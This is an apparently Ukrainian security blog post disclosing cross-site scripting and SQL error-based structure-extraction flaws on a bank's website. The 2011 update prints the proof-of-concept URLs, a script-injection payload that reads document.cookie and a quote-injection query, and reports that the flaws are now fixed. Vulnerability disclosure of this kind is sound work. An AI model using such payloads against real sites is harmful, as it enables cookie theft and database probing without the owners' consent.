Websecurity - Веб безпека

09.10.2010

У червні, 22.06.2010, я знайшов Cross-Site Scripting та SQL DB Structure Extraction уразливості на http://www.kontrakt.ua - сайті банку Контракт. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про уразливості на www.privatbank.ua.

Детальна інформація про уразливості з’явиться пізніше.

16.06.2011

XSS:

http://www.kontrakt.ua/index.php?pages='&language=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Та три інші XSS, що є в Martinweb CMS.

SQL DB Structure Extraction:

http://www.kontrakt.ua/index.php?pages=’

Зараз дані уразливості вже виправлені. Адміни замінили одну діряву CMS на іншу CMS (менш діряву, але в ній також є дірки).

This entry was posted on 15:21 16.06.2011 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.